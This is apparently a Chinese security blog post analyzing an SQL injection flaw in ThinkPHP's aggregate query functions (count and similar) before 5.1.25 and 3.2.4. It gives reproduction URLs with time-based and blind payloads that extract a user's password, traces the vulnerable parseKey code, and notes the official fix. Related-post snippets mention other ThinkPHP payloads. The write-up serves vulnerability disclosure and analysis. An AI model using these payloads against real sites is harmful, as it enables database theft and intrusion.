Thinkphp 聚合查询漏洞

最新推荐文章于 2025-04-21 19:40:26 发布
最新推荐文章于 2025-04-21 19:40:26 发布
阅读量553 收藏
点赞数
本文深入分析了ThinkPHP5和ThinkPHP3框架中聚合查询函数的SQL注入漏洞,详细展示了漏洞复现步骤及官方修复措施,强调了预编译阶段的安全隐患。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

一个比较水的漏洞,不介意的师傅将就看看。本来是抱着试一下的心态提交的,但是官方给了确认还及时修补了,国产良心。

感觉唯一的亮点就是TP5中为数不多能够获取到数据的注入。

说是漏洞,更恰当一点应该是安全隐患吧,由于是框架洞,总要结合一些开发人员不够专业的代码才能产生漏洞。

这个聚合查询的漏洞主要影响的版本有

  • Thinkphp5 < 5.1.25
  • Thinkphp3 < 3.2.4

影响的函数涉及到所有的聚合查询函数

而且,有一点就是,可以看到在TP5中涉及到SQL查询的地方,几乎都用了预编译

而且由于PDO::ATTR_EMULATE_PREPARES设置的原因,导致模拟预处理关闭,从而在预编译阶段无法从数据库中获取数据,从而报错退出。从之前爆出的几个TP5漏洞中就能看到,这样一个很大的弊端就是即使注入存在,也无法从数据库中获取到数据。

但是这个漏洞在预编译阶段没有使用占位符,从而不会在预编译阶段报错,从而可以顺利通过注入获取到数据

ThinkPHP5 < 5.1.25

漏洞复现

这里创建了一个这样的user

数据库配置请自行配置,然后打开debugtrace模式(方便查看SQL语句

demo样例

public function index()
{
    $count = input('get.count');
    $res = db('user')->count($count);
    var_dump($res);
}

当访问

http://localhost/tp5.1.25/public/?count=id

就能看到返回了数量3

当输入

http://localhost/tp5.1.25/public/?count=id`),(select sleep(5)),(`username

就能看到有明显的五秒的延时

里面改成可以任意的SQL语句,例如通过盲注获取password

http://localhost/tp5.1.25/public/?count=id`),(if(ascii(substr((select password from user where id=1),1,1))>130,0,sleep(3))),(`username

漏洞分析

跟进到count函数中thinkphp/library/think/db/Query.php:643

跟进$count = $this->aggregate('COUNT', $field); thinkphp/library/think/db/Query.php:619

这里又调用了$this->connection->aggregate

注意此时的$field字段还是一开始传入的字符,没有任何变化

然后跟进到thinkphp/library/think/db/Connection.php:1316

可以看到这里的经过第一句之后$field被组合成了count语句,跟到parseKey的函数定义中就能看到具体处理过程

public function parseKey(Query $query, $key, $strict = false)
{
    ...
    $key = trim($key);

    if (strpos($key, '->') && false === strpos($key, '(')) {
        ...
    } elseif (strpos($key, '.') && !preg_match('/[,\'\"\(\)`\s]/', $key)) {
        ...
    }

    if ('*' != $key && ($strict || !preg_match('/[,\'\"\*\(\)`.\s]/', $key))) {
        $key = '`' . $key . '`';
    }
    ...

    return $key;
}

省略了很多无关的处理函数,可以看到就是简单的通过反引号的字符串相连

$key = '`' . $key . '`';

继续回来到aggregare中,跟进$this->value,这就是真正执行这条SQL语句的地方

thinkphp/library/think/db/Connection.php:1252

可以看到通过 $this->builder->select($query);将之前传入的参数直接拼接到了sql语句中

最后形成$sql

SELECT COUNT(`id`),(select sleep(5)),(`username`) AS tp_count FROM `user` LIMIT 1

$query->getBind()的时候是没有需要绑定的参数的,也就避免了后面预编译阶段的报错

最后$pdo = $this->query($sql, $bind, $options['master'], true);执行了SQL语句,产生注入

全局搜索->aggregate的调用,发现所有的聚合函数都是调用了这个模块,同理也就产生了SQL注入

ThinkPHP3 < 3.2.4

漏洞复现

数据库配置和TP5中一致,也要打开debugtrace信息

demo样例

public function index()
{
    $count = I('get.count');
    $m = M('user')->count($count);
    dump($m);
}

这里的payload和TP5中的有一点点的不一样,不过也差不多

http://localhost/tp3.2.4/?count=id),(select password from user where id=1),(username

可以看到直接注入出了数据

漏洞分析

没啥好分析的了,和TP5类似,就是少了一个反引号的差别

漏洞修复

官方很机智的在parseKey中加入了正则校验,不符合这个校验就会抛出异常

 

 

ThinkPHP漏洞总结
文公子的博客
11-03 2905
ThinkPHP漏洞总结 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 0x00前言 本篇文章将针对ThinkPHP的历史漏洞进行整理复现,今后爆出的ThinkPHP漏洞,也将进行补充更新。 0x01ThinkPHP远程命令执行/代码执行漏洞 一,ThinkPHP
ThinkPHP5.1.25_聚合函数的SQL注入分析
11-28 734
ThinkPHP5.1.25_聚合函数的SQL注入分析 ThinkPHP5.0.0-ThinkPHP5.0.21/ThinkPHP5.1.3-ThinkPHP5.1.25 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $options = request()->get('options'); $result = db('users')-&g
ThinkPHP漏洞全集:深度分析与讨论
dghsgzhz12的博客
07-05 1059
ThinkPHP中,如果开发者没有正确配置文件包含的路径或没有对用户输入的文件路径进行验证和过滤,就可能导致此类漏洞的产生。为了防范文件包含漏洞,开发者需要对所有用户提交的文件路径进行严格的验证和过滤,确保只包含合法的文件路径。攻击者通过在用户输入的数据中注入恶意的SQL语句,绕过系统的验证和过滤机制,实现对数据库的非法访问和操作。通过对ThinkPHP漏洞全集的讨论,我们可以看到,这些漏洞的存在不仅对系统的安全性构成威胁,也暴露出开发者在开发过程中的疏忽和不足之处。一、ThinkPHP漏洞概述。
Thinkphp常见漏洞总结
weixin_46622976的博客
07-12 6992
ThinkPHP漏洞整理
ThinkPHP5 的 SQL 注入漏洞
sucker的博客
04-21 863
也就是:$_GET['ids'] 是一个数组,key 为 '0,updatexml(0,concat(0xa,user()),0)'这是一个报错注入语句,updatexml() 是 MySQL 中常见的报错函数,用于将数据输出到错误信息中。攻击者可利用漏洞构造恶意 SQL 语句,绕过预编译机制,直接操作数据库,导致数据泄露、篡改甚至服务器沦陷。时,预编译过程会直接解析 SQL 语句中的动态内容,导致攻击者可通过报错注入(如。)是 ThinkPHP5 框架中一系列因设计缺陷导致的安全问题,主要影响早期版本。
ThinkPHP漏洞大全
FY10033的博客
05-04 1万+
tp5payload大全 https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection tp5参考文献 https://blog.csdn.net/weixin_40709439/article/details/86564457 tp版本发现 1.使用错误的路径 2.采用错误的参数 1.版本5.0.x<5.0.23 1.0 5.0.x-5.0.23通杀RCE-payload # 第一个 http://127.0.0.1/cms/thi
ThinkPHP漏洞合集(专注渗透视角)
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
Thinkphp漏洞总结
qq_44640313的博客
11-02 892
ThinkPHP框架漏洞知识总结
追洞小组 | ThinkPHP5 SQL注入漏洞&敏感信息泄露
Ms08067安全实验室
03-02 607
文章来源|MS08067 WEB攻防知识星球本文作者:叫我啊(Ms08067实验室追洞小组成员)漏洞复现分析 认准追洞小组一、漏洞介绍ThinkPHP是一个开源的,快速、简单的面向对象的...
ThinkPHP 3.2.3 核心版.zip
05-23
增加聚合模型扩展;支持复合主键;多表操作的支持完善;模型的CURD操作支持仅获取SQL语句而不执行;增加using/index/fetchSql/strict/token连贯操作方法;模型类的setInc和setDec方法支持延迟写入;[安全方面]I函数...
ThinkPHP5.1.C+CmsEasy-SQL注入
m0_67441173的博客
08-11 1473
用户可控数据未经过滤,传入 Query 类的 max 方法进行聚合查询语句构造,接着调用本类的 aggregate 方法,本次漏洞问题正是发生在该函数底层代码中,所以所有调用该方法的聚合方法均存在 SQL 注入问题,我们看到 aggregate 方法又调用了 Mysql 类的 aggregate 方法,在该方法中,我们可以明显看到程序将用户可控变量 $field 经过 parseKey 方法处理后,与 SQL 语句进行了拼接。Builder类下的select方法:重点看对字段的处理,也就是重点看。
thinkphp漏洞总结
热门推荐
scu_hacker博客
01-19 1万+
目录 前言 一、远程代码执行漏洞 1.1 影响范围 1.2 漏洞详情 二、5.x远程命令注入 三、5.1.x SQL注入 前言 thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5漏洞 一、远程代码执行漏洞 1.1 影响范围 thinkphp&l...
ThinkPHP漏洞总结(利用)
yangbz123的博客
04-26 1万+
ThinkPHP介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ...
ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6,40道网络安全面试
m0_60721823的博客
04-06 1353
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 4544
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1thinkphp5 SQL注入1漏洞影响版本: 5.0.13
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 4163
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U
从0认识+识别+掌握thinkphp漏洞(超详细看完拿捏tp)文末带工具
milu_Sec的博客
12-30 7191
国人开发的框架,上手简单,开发成本低,搭建容易所以,tp框架常见于一些违法网站上面tp版本信息文档中心 · ThinkPHP 这是tp的官方文档,包含了框架一些基本知识,一些必要的知识我会在复现过程中一一讲解,不过还是建议自己去看一下文档。
Thinkphp漏洞详解合集
Aiwin的博客
05-24 4202
Thinkphp漏洞合集详细分析(未完成)
thinkphp whereRaw
最新发布
06-14
<think>我们正在讨论ThinkPHP框架中whereRaw方法的使用。根据引用[1]和引用[2],我们可以知道whereRaw用于执行原生的SQL条件片段,并且可以与其他查询条件组合(如AND)。同时,引用[3]提到了聚合函数的使用,但与我们当前问题关系不大。引用[4]虽然讨论的是Laravel框架,但思路类似,即使用原生表达式。用户需求:在ThinkPHP框架中使用whereRaw实现自定义查询条件。步骤:1.whereRaw方法允许我们直接写入SQL条件字符串,它会被当作一个条件片段插入到整个查询条件中。2.注意:使用whereRaw时需要避免SQL注入,确保传入的条件字符串是安全的。3.示例:在查询中,我们可能需要使用一些原生的SQL函数或复杂的条件,这时whereRaw就非常有用。示例代码:假设我们有一个`book`表,我们想查询书名以"thinkphp"结尾且状态为1的书籍。```php//使用whereRaw进行自定义条件查询$book=Db::table('book')->whereRaw('namelike"%thinkphp"ANDstatus=1')->find();```另一个示例:假设我们需要查询价格大于100且折扣小于8折的书籍,并且要求出版日期在2020年之后。我们可以这样写:```php$books=Db::table('book')->whereRaw('price>100ANDdiscount<0.8ANDpublish_date>"2020-01-01"')->select();```如果查询条件需要动态构建,我们可以使用参数绑定来防止SQL注入:```php$keyword='thinkphp';$status=1;$book=Db::table('book')->whereRaw('namelike?ANDstatus=?',["%{$keyword}",$status])->find();```在参数绑定中,使用`?`作为占位符,然后传入一个数组,数组中的元素按顺序替换占位符。注意事项:-使用whereRaw时,如果条件片段中包含用户输入,务必使用参数绑定,以避免SQL注入漏洞。-whereRaw的条件片段会直接拼接到SQL语句中,所以确保条件片段的正确性。相关问题:1.ThinkPHP中,whereRaw和where方法有什么区别?2.如何防止在使用whereRaw时的SQL注入问题?3.ThinkPHP中除了whereRaw,还有哪些方法可以执行原生SQL?4.在复杂的查询中,如何组合使用whereRaw和其他的查询构造器方法?</think>### ThinkPHP whereRaw 使用方法详解 在ThinkPHP框架中,`whereRaw()` 方法用于执行自定义SQL条件片段,特别适合处理复杂查询条件或需要原生SQL表达式的场景。以下是详细使用方法和示例: #### 基础语法 ```php Db::table('表名')->whereRaw('原生SQL条件表达式')->操作(); ``` #### 核心特性 1. **直接嵌入SQL** 允许在查询中直接使用数据库函数、复杂条件表达式等 ```php // 示例:使用MySQL的DATE_FORMAT函数 Db::table('orders') ->whereRaw("DATE_FORMAT(create_time, '%Y-%m') = '2023-08'") ->select(); ``` 2. **支持参数绑定(防SQL注入)** 通过占位符安全传递外部变量: ```php $status = 1; $minPrice = 100; Db::table('products') ->whereRaw('status = ? AND price > ?', [$status, $minPrice]) ->select(); ``` 3. **组合复杂逻辑** 可自由组合 AND/OR 等逻辑操作符: ```php // 引用[1]示例的增强版 Db::table('book') ->whereRaw('(name LIKE "%thinkphp%" OR title LIKE "%框架%") AND status=1') ->find(); ``` #### 典型应用场景 1. **多条件混合查询** ```php // 同时包含原生条件和链式条件 Db::table('users') ->where('age', '>', 18) ->whereRaw('(credit_score > 80 OR vip_level >= 3)') ->select(); ``` 2. **使用数据库函数** ```php // 计算距离(MySQL示例) $lat = 39.9; $lng = 116.4; Db::table('stores') ->whereRaw( 'ST_Distance(location, POINT(?, ?)) < 5000', [$lng, $lat] )->select(); ``` 3. **子查询条件** ```php // 选择超过平均价格的商品 Db::table('products') ->whereRaw('price > (SELECT AVG(price) FROM products)') ->select(); ``` #### 注意事项 1. **安全警告** 永远不要直接拼接用户输入: ```php // ❌ 危险做法(SQL注入风险) $input = $_GET['keyword']; ->whereRaw("name = '$input'"); // ✅ 正确做法(参数绑定) ->whereRaw('name = ?', [$input]); ``` 2. **跨数据库兼容** 不同数据库的函数语法差异需自行处理: ```php // MySQL: DATE_FORMAT() / SQLite: STRFTIME() ``` 3. **性能影响** 复杂表达式可能影响索引使用,建议配合`explain`分析查询。 #### 完整示例 ```php // 查询价格在100-500元之间且名称包含"ThinkPHP"的书籍 $minPrice = 100; $maxPrice = 500; $keyword = 'ThinkPHP'; $books = Db::table('book') ->whereRaw( 'price BETWEEN ? AND ? AND name LIKE ?', [$minPrice, $maxPrice, "%{$keyword}%"] ) ->order('publish_date', 'DESC') // 引用[2]排序方法 ->select(); ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值